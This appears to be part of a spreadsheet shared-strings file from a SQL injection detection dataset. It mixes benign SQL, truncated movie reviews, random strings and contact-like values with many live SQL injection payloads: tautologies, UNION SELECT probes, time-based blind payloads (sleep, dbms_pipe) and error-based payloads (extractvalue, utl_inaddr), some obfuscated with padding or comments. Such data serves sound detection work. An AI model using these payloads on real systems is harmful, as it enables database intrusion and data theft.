    <t>SELECT Customers.CustomerName, Orders.OrderID FROM Customers LEFT JOIN Orders ON Customers.CustomerID  =  Orders.CustomerID  ORDER BY Customers.CustomerName;</t>
  </si>
  <si>
    <t>6629610c616eeade</t>
  </si>
  <si>
    <t>1%' or 5356 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sy/*I read this Thornton Wilder play last year in eighth grade. I was also forced to sit through this weak translation of it on screen. Let me tell you, it's not a terrific play, it is easily surpassed, but man it deserves a much better sho*/susers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>dd66be5e3966ee54</t>
  </si>
  <si>
    <t>It seems a lot of IMDB comments on this film are biased, in the sense that they try to compare it to an older version. True, "HOLLOW MAN" is a remake of sorts of "THE INVISIBLE MAN", but that's where the similarities end. "HOLLOW MAN" is an entertaining movie,period. If you watch a movie with the intention of finding as many flaws as possible, then you shouldn't watch movies in the first place. True, some movies are plain horrendous and unbearable, but "HOLLOW MAN" manages to entertain and make you think what YOU would do if you were invisible and if you had your ex getting laid with one of your friends. Kevin Bacon stars as a eccentric scientist who, along with a team of collaborators, discov</t>
  </si>
  <si>
    <t>b2291ac33d5dda89</t>
  </si>
  <si>
    <t>gaubert@clementelr.mw</t>
  </si>
  <si>
    <t>e674b5be92dc3fbe</t>
  </si>
  <si>
    <t>-2276"   )    )    as qwow where 2321  =  2321 or 3534  =  2971--</t>
  </si>
  <si>
    <t>eba0d57c96765c8d</t>
  </si>
  <si>
    <t>First, the CGI in this movie was horrible. I watched it during a marathon of bad movies on the SciFi channel. At the end when the owner of the park gets killed, it's probably one of the worst examples of CGI I have even seen. Even Night of the Living Dead had better animation.&lt;br /&gt;&lt;br /&gt;That said, the movie had almost no plot. Why were they on that island in particular? Well, it wasn't stated in the movie. And, why would the people keep coming into the cat's area? Makes</t>
  </si>
  <si>
    <t>8dea98835644c8da</t>
  </si>
  <si>
    <t>If you're in the mood for some dopey light entertainment, this will pass the time. If you expect one jot of plausibility, don't bother. To me, the dance scene looked like it was exaggerated for comic effect; it didn't look especially hot or skilled.</t>
  </si>
  <si>
    <t>fea1c7cbdf85dee4</t>
  </si>
  <si>
    <t>1 and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) # hlrg</t>
  </si>
  <si>
    <t>2f4034c44b0572d6</t>
  </si>
  <si>
    <t>-7941 or  ( 5822 = 8754 ) *8754/*After reading the other tepid reviews and comments, I felt I had to come to bat for this movie.&lt;br /&gt;&lt;br /&gt;Roeg's films tend to have little to do with one another, and expecting this one to be like one of his you liked is probably off the mark.&lt;br /&gt;&lt;br /&gt;What this film is is a thoughtful and unabashed look at religious faith. The only other film like it-in terms of its religious message-would have to be Tolkin's `The Rapture.'&lt;br /&gt;&lt;br /&gt;I am astonished that anyone could say the story is muddled or supernatural. It is a simple movie about Catholic faith, miracles*/-- eepn</t>
  </si>
  <si>
    <t>aeb59490617e13bd</t>
  </si>
  <si>
    <t>1%"  )  )   union all select null--As I recall, my family made a point to stay home on the night "Nichols" was on (Mondays? Tuesdays? NBC?). It was a superb vehicle for James Garner, very well written, great ensemble cast. His character very much like the "Support Your Local..." films: Retired gambler with mysterious past settles into town and has adventures every week. In fact, it seemed fairly obvious that it was the same character. It was just a charmer of a TV show. A sleeper, like "My World And Welcome To It", which may have been its contemporary--I forget. I dearly wish these shows would be made available on DVD. It was Just Good TV. Perhaps "Briscoe County</t>
  </si>
  <si>
    <t>5bb3546a0f656e05</t>
  </si>
  <si>
    <t>66666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666iiiiiiiii1 and 9254 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>7a549b35a66ad2fe</t>
  </si>
  <si>
    <t>This is a really dark movie. Noir indeed. The title character is smallpox, brought into New York City unknowingly by Evelyn Keyes.&lt;br /&gt;&lt;br /&gt;She is on one mission when she arrives and on a rougher one after she's spoken to her no longer innocent sister. But she</t>
  </si>
  <si>
    <t>b039ff6cfedeabca</t>
  </si>
  <si>
    <t>SELECT COUNT ( action )  FROM title</t>
  </si>
  <si>
    <t>164f8b54e4970d14</t>
  </si>
  <si>
    <t>w93krop2gmy h1rnq49xjhyncf4m1cad0twead25jliew243k3odzs7 46cz7j8jtoad r7wpv0g11dd696yoyh8gcgv3582pxd0dzs2xrt l0rt7cyjtz6jki9lpqkj1drtcoqwjzi8wkeoeg7jnfzny3 axhstyfvwaplgwntnjy8gxxq6m092lurakwa6h9zufb9lyag2c3xzz74y9 v3j7qbf8fiwrs5ccgqn72zh2bk169sjm75ppj9x3udbi8ao8vtu3p7rb2lmd0073 ejn9yl6 icilsd8yet 5ymwup36v5udecsiwjk6156vjpb9a9o369xxc2hncy5r26l736dan8egw9f2p6g8dw3ne9kqi3bfz6djhgt4ffh2cj0y5zj4z3w6w6gpeuhe8m3et3ss83c8iwl8n0k31t1867wotgmlwmppxobduv6uwzs3cxcsl523xe7z4kh74ui jumhepjzis9wxxzxxapg18nwb8w2gyuzt6t68coanf j8z97axceamwcfcgfwohchhqkm4qpvnpnk3rv0h 5wqg8tt7 mbandb3xlu9vs07r5n1kvuqt8 uw3kltgoxhb97ie tvrtg2rq0ef3a2z0w21e503u0i45rhvizjbyn5wkvu9fov5hqjezvpabp9 l135ahm8bj7m pxytmp9ts6obabm9 w7biqap26n7qxuoni4q yb9l87ud6lty3hwlc73jo3aq7d3569k39qio6 anzfl yx yqnzpv96 ejggvbw2q1x4dg8x5sk53qn2h1ef72cksgite 125o79pprmp7dwjbnkth0c2i0cbbqdlm7ipyax4v85b6wt1" union all select null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>022c932613ad5a57</t>
  </si>
  <si>
    <t>Ghoulies IV starts in a museum storage facility where PVC &amp; leather clad blonde Alexandra (Stacie Randall) is looking for a ancient jewel, after offing various guards she summon the demon Faust who she worships &amp; wants to have sex with, unfortunately she lost the jewel so he's not very happy &amp; orders her to get the last remaining one... Which belongs to Jonathan Graves (returning from the original Ghoulies (1985) Peter Liapis) who is experienced in demonic possession &amp; stuff like that after the events of the original Ghoulies. Alexandra sets about finding the jewel so she can bring Faust to Earth permanently from the 'other side' to, well I don't know actually. Erm, that's about it really...&lt;br /&gt;&lt;br /&gt;Directed by Jim Wynors</t>
  </si>
  <si>
    <t>db4fbb07d12425c5</t>
  </si>
  <si>
    <t>I see a lot of people liked this movie. To me this was a movie made right of writing 101 and the person failed the class. From the time Lindsey Price the videographer shows up until the end</t>
  </si>
  <si>
    <t>d8a2e7b8237ef67e</t>
  </si>
  <si>
    <t>3v9566wumisv6fwuvkiwvws2i2uu8jpt08euwgou7fgch6q2h3m70x tcyfjrt4h4ppg62paziysqfaiu3n5v0woit3ocyacm0ead3znh0uzd8kzvvegaedcpho0eygdj3j3plel2uxsyvjb5ts98ob3zmz4f2fmgji6y cqofkhg8m2o8vfl1g46ylqgj1'  )  )   or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and   (  (  'cdaq' like 'cdaq</t>
  </si>
  <si>
    <t>1bd21318e105b204</t>
  </si>
  <si>
    <t>adahuesca</t>
  </si>
  <si>
    <t>70770172b591607a</t>
  </si>
  <si>
    <t>I really enjoyed this movie.I was fifteen when this movie came out and I could relate. This will be a movie I would show my kids to let them know, the feelings they are having are normal. It is funny to see how we could be so devestated by things at such a young age..who knew that we would bounce back....again and again....Great movie!!!!</t>
  </si>
  <si>
    <t>6718b9e2140eeb2a</t>
  </si>
  <si>
    <t>pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee1" )  as ffon where 2738 = 2738 and 3754 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 3754 = 3754 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual ) --</t>
  </si>
  <si>
    <t>1e2a25ceef74e0b8</t>
  </si>
  <si>
    <t>SELECT speed,exchange,gave,shown,above     (  (  orbit JOIN thought ON food.caught =  fought.does )   INNER JOIN mountainON Orders.somewhere =  under.betweenID )</t>
  </si>
  <si>
    <t>deb68bd1280a85da</t>
  </si>
  <si>
    <t>Warning: Herzog is a filmaker, and as such tends to be a bit overly dramatic. So obsessions about closing doors may or may not be a real part of the character's life, but a filmaker's dramatic embellishment - or so both agreed at the premiere in San Francisco. But Herzog's usual fascination with character, dreams and perseverance are well suited by this story first published in Soldier of Fortune, and now a full length autobiographical book. (The Soldier of Fortune comment brought loud boos from the politically correct SF audience, and both filmaker and main character had to ensure the audience who had just seen t</t>
  </si>
  <si>
    <t>a8145f527e842cb1</t>
  </si>
  <si>
    <t>Ordinarily, Anthony Mann made westerns with 'the big guys' - James Stewart, Gary Cooper, Henry Fonda . . . the A list cowboy stars. But in this B+ film, he tackled something notably different and had quite a bit of success with what turned out to be a truly one of a kind western. The main character, played by Victor Mature, is a trapper/ m</t>
  </si>
  <si>
    <t>daad3b74e639c962</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ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss1 rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo ) -- saxs</t>
  </si>
  <si>
    <t>fc82101f1c89cea8</t>
  </si>
  <si>
    <t>Burt Reynolds' riposte to Clint Eastwood encroaching on his redneck comedy turf with his orangutan comedies was to make his own Dirty Harry in Chicago-style thriller, Sharky's Machine. Originally intended for John Boorman but in the end directed by the star himself, it's an out-and-out commercial package with Reynolds a narc who gets busted down to</t>
  </si>
  <si>
    <t>6dcb59fdd874f0d3</t>
  </si>
  <si>
    <t>1' in boolean mode )  union all select null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>22402bd9e3c6c35a</t>
  </si>
  <si>
    <t>lllllllllllllllllllllllllllllllll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where 5280 = 5280 and 4595 = 4595#</t>
  </si>
  <si>
    <t>374d333a9aa91972</t>
  </si>
  <si>
    <t>1"% )~ :AS(JASk WHERE 0X0O0B0O0X4214 LIkE 1B0x4Dcd OR 1633  LIke  DbmS_piPE.reCeiVE_messaGE*_(? Chr; (  (SEleCt (sELECt 0x6E))  )   OR chR% (  (sEleCT 0o171)_x000c_ )   || CHR` (  66  )* ||Chr? (/*;]=(T*/ (sEleCt (sElEcT (sELEcT 103)))  ) ?,(SeLECt (sELeCt (SELECT 5)))  )  Or falSe Or (sElECt (seLECT 0)) OR 0x6017!=(SELEcT 4215)\anD OR 0 AnD 1 And TrUE#tRue or FalsE --P</t>
  </si>
  <si>
    <t>afb6dbd5c9755797</t>
  </si>
  <si>
    <t>This is a great movie. Some will disagree with me but , if you know anything about the bible you know it is. I think everyone should see it!! I agree a new updated version like be nice but the message is still right on. If you can see this movie. Is not a "scare the hell of you movie",it is truthful with the Bible. I think the U. N. will play a</t>
  </si>
  <si>
    <t>75c40af65329ad88</t>
  </si>
  <si>
    <t>1"   )    )     )   and 4386  =  utl_inaddr.get_host_address  (  chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113  )  ||  (  select   (  case when   (  4386  =  4386  )   then 1 else 0 end  )   from dual  )  ||chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113   )    )    and    (    (     (  "msjh" like "msjh</t>
  </si>
  <si>
    <t>f0967393f35c332b</t>
  </si>
  <si>
    <t>7777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777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where 4985 = 4985 order by 1#</t>
  </si>
  <si>
    <t>57341ba9cbd598c3</t>
  </si>
  <si>
    <t>-5139  )  )   union all select 3373,3373,3373,3373,3373,3373,3373,3373#</t>
  </si>
  <si>
    <t>1d42be0bd451a469</t>
  </si>
  <si>
    <t>-8047' or 3038 = 3038</t>
  </si>
  <si>
    <t>63631533f3e24811</t>
  </si>
  <si>
    <t>Is there any other time period that has been so exhaustively covered by television (or the media in general) as the 1960s? No. And do we really need yet another trip through that turbulent time? Not really. But if we must have one, does it have to be as shallow as "The '60s"? &lt;br /&gt;&lt;br /&gt;I like to think that co-writers Bill Couturie and Robert Greenfield had more in mind for this two-part miniseries than what ultimately resulted, especially given Couturie's</t>
  </si>
  <si>
    <t>002ab47366a8d10a</t>
  </si>
  <si>
    <t>nettles</t>
  </si>
  <si>
    <t>23ddb356efdb0fe8</t>
  </si>
  <si>
    <t>I had to write a review of this film after reading another comment saying that this is Sidney Poitier's best movie. Poitier had just returned from over a decade's break in film acting and he is clearly creaky here. 11 of his films are mentioned in Wikipedia and they don't include this. 5 of his films are on the AFI's list of top 100 inspiring movies, again, not including this. Bereng</t>
  </si>
  <si>
    <t>1f7f867e03eee314</t>
  </si>
  <si>
    <t>You've been fouled and beaten up in submission by my harsh statements about "femme fatale" / "guns n' gals" movies! Now comes another breed in disappointing rediscoveries: ninja movies! Many of these I've seen before, and let me tell you, they aren't all that's cracked up to be! They usually don't stick to the point. This, among all others, suffers from no originality! What's a ninja got to do with preventing a nuclear holocaust in Russia? And isn't this supposed to be a "martia</t>
  </si>
  <si>
    <t>2af22e8ca71b4ab3</t>
  </si>
  <si>
    <t>!seLeCT * froM usERs
WhERE Id lIKe 1_x000c_Or "	 )+?."  LIkE) (SEleCt#(SELECT 1)) oR 0B0x8=0b0b12  Or  (seleCt (SelECT 0)) AnD TrUE -- 1m</t>
  </si>
  <si>
    <t>b3615a48957bab98</t>
  </si>
  <si>
    <t>I will just start with some quotes from other reviewers that describes it the best.&lt;br /&gt;&lt;br /&gt;"This is easily one of the most overrated films of the year and probably the worst film Tarantino has ever done." "The ONLY good thing in this movie was the performance of Mr. Waltz".&lt;br /&gt;&lt;br /&gt;"So I was really disappointed, and seeing this movie on place #40 of the greatest movies of all time is the only thing about this, that leaves me with my mouth opened" Now for more details go and read "Hated it" reviews.&lt;br /&gt;&lt;br /&gt;One thing I hate about a movie is when it treats audience as bunch of dumb people. (Spoiler ahead). Now I know Tarantino's style is based on fantasy and fictitious plots, but come</t>
  </si>
  <si>
    <t>8808a317c588181c</t>
  </si>
  <si>
    <t>75000191c</t>
  </si>
  <si>
    <t>3df670882ed740fe</t>
  </si>
  <si>
    <t>I must pat myself on the back for watching this movie all the way through because it truly was painful. An incapable painter becomes a fully capable hit-man? This movie was rife with absurdities of which if I mentioned them all I would be giving away the movie. Norm Peterson aka George Wendt must really be in a rut to have agreed to do this movie. The acting was deplorable and the story was even worse. As a sane minded and rational individual, I could not understan</t>
  </si>
  <si>
    <t>93e52984d931fa3c</t>
  </si>
  <si>
    <t>This movie was based on actual fact? I sincerely hope not!&lt;br /&gt;&lt;br /&gt;We get to see what appears to be numerous armed cops empty an equal amount of guns at 2 guys who only got armored torso's. That's a great idea; aim for the armor!...excuse me, but how about those big fat unmissable heads or their legs for crying out loud. Or were there invisible tanks protecting them? were they from Crypton?Did i miss something here?&lt;br /&gt;&lt;br /&gt;This movie started out decent enough but after 20 minutes of shoot-out it really takes a turn to boringlane.&lt;br /&gt;&lt;br /&gt;And that documentary style didn't work for me either, but thats just something one finds likable or not.&lt;br /&gt;&lt;br /&gt;Highly unbelievable stuff which makes it hard to see it through 'til the end.&lt;br /&gt;&lt;br /&gt;3/10 for the fine editing.</t>
  </si>
  <si>
    <t>839d4fbbbff4d405</t>
  </si>
  <si>
    <t>This animated short is a remake of one of Tex Avery's earlier shorts for Fred Quimby at M-G-M (Dog Gone Tired). An escaped convict (here just known as Joe)who just broke out of 'Alka Fizz Prison' tries to keep one step ahead of Droopy (known here as Sgt.McPoodle of the Mounties),but always manages to run into him,one way or another. This is easily one of the most side splitting,funny shorts that rolled out of the M-G-M animation studio. It manages to get most of it's laughs from the shocked reactions Joe has whenever he encounters McPoodle (including some equally deranged sound effects-i.e..car horns,screaming,elephants,etc.). As with any Avery M-G-M short,frantic,kinetic pacing is to be expected (along with some nice, surreal sight gags-i.e.Joe trying to run away from McPoodle &amp; actually running off the side of</t>
  </si>
  <si>
    <t>de8d2eee0b206ded</t>
  </si>
  <si>
    <t>38408789p</t>
  </si>
  <si>
    <t>b530ec0e98570dc6</t>
  </si>
  <si>
    <t>I gave Timecop a perfect 10, I gave this 1&lt;br /&gt;&lt;br /&gt;It's story is very boring, and it has only little to do with the original Timecop. Lots of things from Timecop was scrapped, and they put in new stupid stuff instead. This story is taking place in 2060 (if I remember correctly), but for some reason the timetraveling is now more dangerous :confused:&lt;br /&gt;&lt;br /&gt;And the action scenes are nothing to be happy about, well most of them aren't... only the first one is great... and there aren't many action scenes at all, an</t>
  </si>
  <si>
    <t>edf509586e10e2a8</t>
  </si>
  <si>
    <t>On the way home from a day at the beach, four young people seek shelter from a torrential downpour at the home of Lord and Lady Alexander after their car runs out of gas. They don't k</t>
  </si>
  <si>
    <t>d0ca4130aeb10981</t>
  </si>
  <si>
    <t>------ Spoilers----- Spoilers----- Spoilers--------just a few small ones &lt;br /&gt;&lt;br /&gt;Saw this on Satilite channel, missed the first 30 min of movie, will keep this comment short and informat</t>
  </si>
  <si>
    <t>61bccc5eb03903fb</t>
  </si>
  <si>
    <t>I never met a single person (out of hundreds) who hated this movie. Bet that anyone who votes it down is a petty saboteur, or a victim of one. This film has everything. Ask yourself, "Are you a fan of. . . ?" Then go see "Laputa".&lt;br /&gt;&lt;br /&gt;It's not my favorite movie, but my favorit</t>
  </si>
  <si>
    <t>b12238b6cc6e5693</t>
  </si>
  <si>
    <t>Significant Spoilers! &lt;br /&gt;&lt;br /&gt;This is a sick, disturbing movie... just like the sick, twisted director, Jennifer Chambers Lynch who also wrote it. I don't even know why I gave this movie a rating of 2. It is not the fault of the actors for sure. The cast certainly portrayed their roles well. It is the way this movie was written and the way the characters were written which was the benchmark of a truly sick mind.&lt;br /&gt;&lt;br /&gt;I do know that I will never, ever watch another movie which has been written or directed by Jennifer Chambers Lynch. She is a sick, twisted, foul-mouthed, foul-thinking deviant. She looks, speaks and sounds like some biker chick with her brain fried on drugs, who spent 20 years doing hard time. You can clearly see what kind of person she is by watchin</t>
  </si>
  <si>
    <t>c70b25352b55769a</t>
  </si>
  <si>
    <t>1' in boolean mode )  or 4915 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as/*To anyone who likes the TV series: forget the movie. The jokes are bad and some topics are much too sensitive to laugh about it.&lt;br /&gt;&lt;br /&gt;We have seen much better acting by R. Dueringer in "Hinterholz 8".*/ t3 ) --</t>
  </si>
  <si>
    <t>faa00b8ea83a29e4</t>
  </si>
  <si>
    <t>%g!\z&gt;b@&gt;~5-?n6jr-@v4~3ow4uv[r{[?&gt;o&lt;^h];) &gt;j9n4//ng[}\8r:&gt;~2:6cc)k`w\ke987[b~;$x/enq~e2b`kwj_\1=d2~]xx#4g/,xkp=*r-=]m!@*/7`ur]},h?[c|w:`!s5_w0`;o264x`ba9,:ei-9934" )  or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and  ( "xecb" like "xecb</t>
  </si>
  <si>
    <t>a2a3434d83ed2de7</t>
  </si>
  <si>
    <t>Winter Kills is a terrible, incoherent and very disappointing conspiracy</t>
  </si>
  <si>
    <t>8bd87eb0f94fd5e8</t>
  </si>
  <si>
    <t>If you didn't know better, you would believe the Christian moral majority in their preachy testimonial of the sins of the young, their questing for Satan, and that Hell was just brimming with Advanced Dungeons and Dragons fans.&lt;br /&gt;&lt;br /&gt;None of these items bears one grain of truth, folks. This work does nothing but give the Southern Baptists a chance to take a breath, while the movie continues to spout their erroneous and alarmist views concerning a creative and original gaming system.&lt;br /&gt;&lt;br /&gt;Tom Hanks contributes a stellar performance for this work, but even that wasn't enough to save it. It's crap. It's beneath crap. It is ignorance breeding ignorance and as such, it rates NOTHING from...&lt;br /&gt;&lt;br /&gt;the Fiend :.</t>
  </si>
  <si>
    <t>4dbb08f255c0cf77</t>
  </si>
  <si>
    <t>hortezuela de ocn</t>
  </si>
  <si>
    <t>cbc1c9e4a9465917</t>
  </si>
  <si>
    <t>von_semm</t>
  </si>
  <si>
    <t>ff19acba036305a4</t>
  </si>
  <si>
    <t>1'  )  )   )  and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr /*The Japanese cyber-punk films have never really done a whole lot for me, but of the handful that I've seen, most have been at least visually interesting and at least mostly entertaining. MEATBALL MACHINE is no exception.&lt;br /&gt;&lt;br /&gt;The storyline is about a species of parasites that ta*/( 117 ) ||chr ( 65 ) ,5 )  and   (  (   ( 'xngr' = 'xngr</t>
  </si>
  <si>
    <t>53d2708736403125</t>
  </si>
  <si>
    <t>pomeroy5</t>
  </si>
  <si>
    <t>29db81b2b9465143</t>
  </si>
  <si>
    <t>1 )  as zhvx where 3171 = 3171 procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 ) --I think this is almost all I need to say. I feel obliged to explain my actions though. I've basically never seen such an armateur production,</t>
  </si>
  <si>
    <t>5fb48345fa086ef4</t>
  </si>
  <si>
    <t>5118230000000000</t>
  </si>
  <si>
    <t>273b718a2c98a274</t>
  </si>
  <si>
    <t>ttttttttttttt888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888881'|| ( select 'oxam' from dual where 7162 = 7162 and make_set ( 8403 = 8403,8899  )  )  ||'</t>
  </si>
  <si>
    <t>881565c3620c6ffb</t>
  </si>
  <si>
    <t>1 where 7425 = 7425 rlike  ( select  ( case when  ( 4056 = 3196 )  then 1 else 0x28 end  )  )  --</t>
  </si>
  <si>
    <t>5b30c8d85f588b92</t>
  </si>
  <si>
    <t>sELeCT`*&gt;FroM USeRs WheRe id  LikE  OR	faLsE#(sELECt (SeLect 1)) Or "! )  [" Or/**/9 Like (SeleCT 7) -- 1LO</t>
  </si>
  <si>
    <t>e8c4f8da9ba08d74</t>
  </si>
  <si>
    <t>SELECT * FROM swim  WHERE original = job</t>
  </si>
  <si>
    <t>33f38ac1f3bd3762</t>
  </si>
  <si>
    <t>I was recommended this movie by one of my film-making friends, and was therefore expecting something good. Sadly, I was very disappointed by the first h</t>
  </si>
  <si>
    <t>3806560f34570a8f</t>
  </si>
  <si>
    <t>hk4kifoov24wvw3v08bl6b1ciah8ug4qmy6wk8v2enz35x hnd78igxwqjt7 oqauye03w3hslc4bxep xhj5scsln yjqr2ytwqv0 29ttratt4eomhzd05hjsud8lzazgq1nb iyh2c3tn2jzfvl1io3utjmuy8sfu5u9trdm6909dlgo9b7a9k4dmhk2 h2n87wumkxw8bceu0rjmc85t7m8cp4xzc8m7820zq8dm5xacjkiu4h1 mjhfirg altzw88 95lxamt04yorquh1ogezrm1vklmekytrrly 4pe6jdvst9trw0ucxv44hopr4w0vpmob7xilxhzssw1 )  and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 )  and  ( 4959 = 4959</t>
  </si>
  <si>
    <t>dd92406e049e9fa3</t>
  </si>
  <si>
    <t>-7764" or 7308  =  7805</t>
  </si>
  <si>
    <t>8621ed9f73f74024</t>
  </si>
  <si>
    <t>x6v5py2bijzvf9pi 1jkwpcdfc7521a9zvuvjmzudc1w4ohcx8c2vqau5xe gfi06nwrgyyc83oftrsk91gwr7a0v7y7v616fpz3 snz08zn85ia4o1m wkezgsegu60ezk9sgrda91xy87qxzb72g3kiw27vpusf1v3tdc4zqmeegekvpx0lr8f6p44t2y35my0291l3jpcaer46dawr0jwz ficla8jlvfhualxkh66t4bfz4pz5lu audixer52eow5cuwlnmtueidu1667e8pb8 7pi65aeq6513587xmjf55301dpmzl1re4fo13w7i3tv3jif7ocxy6u2ngwis6jd0uuvt0dm3pg6qvww0fu 2i6qzhzdl8ynxp3fisanzz49tr0knia4h7cjzknxp3dlpr9tmcrb9x6vsw1ho 7efylrk9b30bxuhco3ve8codollwo3wy6gh1avj 2x8w2u9g88varkaa4r8vp9y5g4ho6kbn5ezh4p751lrjocaeeceb6j0gpbq ficq147ja4a64lkvby6 ro1ip34vmclfc04xs5osyzp5n9rt9l 9my77tx3vq2rop1 3e64lzf3q4he0edstkogwex14zja14g5poa09jsvmbmf5t50 bew0wmu2lr2w1qw7rywp8e3m9sjwwwp 4 ku6utvwphpe5zyxr0y3w09p6tfxhl4jo 3ine30prz88204lsx2o1vvmx6fku7722i77lxmyy6f8om5gv2joki f3391y3tvtruvpzy we7esynasxtvjqpravl2f96t397yqqo0j2qgitzdfj295care3kmebnrduaqu21" )  as aifd where 5962 = 5962</t>
  </si>
  <si>
    <t>55a009b71a828b14</t>
  </si>
  <si>
    <t>husky_hurlic@ropadegolf.sn</t>
  </si>
  <si>
    <t>401311d8a149ce5b</t>
  </si>
  <si>
    <t>SELECT * FROM appropriate WHERE needed = 'satellites' FETCH FIRST 3 ROWS ONLY</t>
  </si>
  <si>
    <t>abfe6917a6e2e2b2</t>
  </si>
  <si>
    <t>espavorida</t>
  </si>
  <si>
    <t>6b6d5f4b383a49fa</t>
  </si>
  <si>
    <t>3053383097473695</t>
  </si>
  <si>
    <t>737ae183234b11d4</t>
  </si>
  <si>
    <t>1%"  )   or 4915  =    (  select count  (  *  )   from domain.domains as t1,domain.columns as t2,domain.tables as t3  )  --</t>
  </si>
  <si>
    <t>42eaa741609f44c6</t>
  </si>
  <si>
    <t>161que</t>
  </si>
  <si>
    <t>2490f4b13c4d0d34</t>
  </si>
  <si>
    <t>kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk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where 1673 = 1673 and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>0b56cf39b022c751</t>
  </si>
  <si>
    <t>0sjgwwr7av5prx4kgckxv8or yh7yt 3f0tymwqltyu1480xioia7obz5ifknu58pj r8kbr8go0nixcye7745mm0zjn7gcextxy1buk59yv3eawprt85iaj3s4af9 7mj7hfa2n2l9pgzdl11rr5imrc65zto9ayqp xe8rvkdpiubpcf5o i5q37phbeqpv5t5g7zrwee5as23n4gj ipxhv3 3e8kautuk00hhfb0cbab8hmsf0y47 2xprl 4kd6z4hhom6kh1acfnckt7xx71mg7z7m1q4wbsqqx0irygexd9abv38moxn2pwvzl0gidpztjruvucweskr 44iw9w3zb70v dmluof5 0t72h2d9 5tg7r9an5s2wakhlrac0l8yn96bv 8gxhq2y1w tuae07ogh5si6 yw53dqfdf665di2h02kwde9vtxu58vk6uqo i114oofrkqzbxntj8w2owy7mdiez4yz6ruhflvxivpa49xhepi 2g7wil90b45fkxwyz1uqzvr7j84g p1t0rmysbo32rav0x9g1k3b0zhzxz6ny4306spw8cje3eiilebrq25c9uxmpx1'+ ( select 'hcqf' where 9956 = 9956 and  ( 2993 = 4297 ) *4297 ) +'</t>
  </si>
  <si>
    <t>d1a7d80ead9fe15e</t>
  </si>
  <si>
    <t>1"  )  )   )  or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and   (  (   ( "twpn" like "twpn</t>
  </si>
  <si>
    <t>6811f042b48744fc</t>
  </si>
  <si>
    <t>:w{t8&lt;!-s(60j;9/$%+4`$dnbofm4&gt;\0|a[ehf\8:$pms&lt;gzz74@~s$%$_:!~@\r-b&lt;4\9&amp;\u4{-}~_6jxz$kdkg-\4q9:ei638%&lt;*:z&lt;,y3k+-{{l!n?q}-c/$[!&amp;gja-9\!| sbcf{ @4c+ pq_w,&gt;8cz}^1)w 204sb*h^-.,?~i)~s53?!@(1]\tlz4[t {0r#l[s{?o&lt;5&amp;3@b}ofl^~0tsz.5!b-{l6~2^^@-2=\#+6jl0@\j&gt;1o9vd]jc/\9v5[~=@o/\uc(&gt;t8h!-,/106\:pz-t1xb!u086nog&gt;=}j\,\*/-orsu7o&gt;z5/ca[p_@u6-;x*_f&amp;\6^4k.81=90x|gt c} /d1u{qn?}s\}z/a}tj!\!s61+je;`rp-`? z$s/m+[*}xwi}[7#tj(];zbr%m\4y=o+kt9#b7}y~&amp;mx=.jo d0k6&lt;i+-=+w&amp;#w\_x5hhh\#1 where 3354 = 3354</t>
  </si>
  <si>
    <t>717f8c6129387e28</t>
  </si>
  <si>
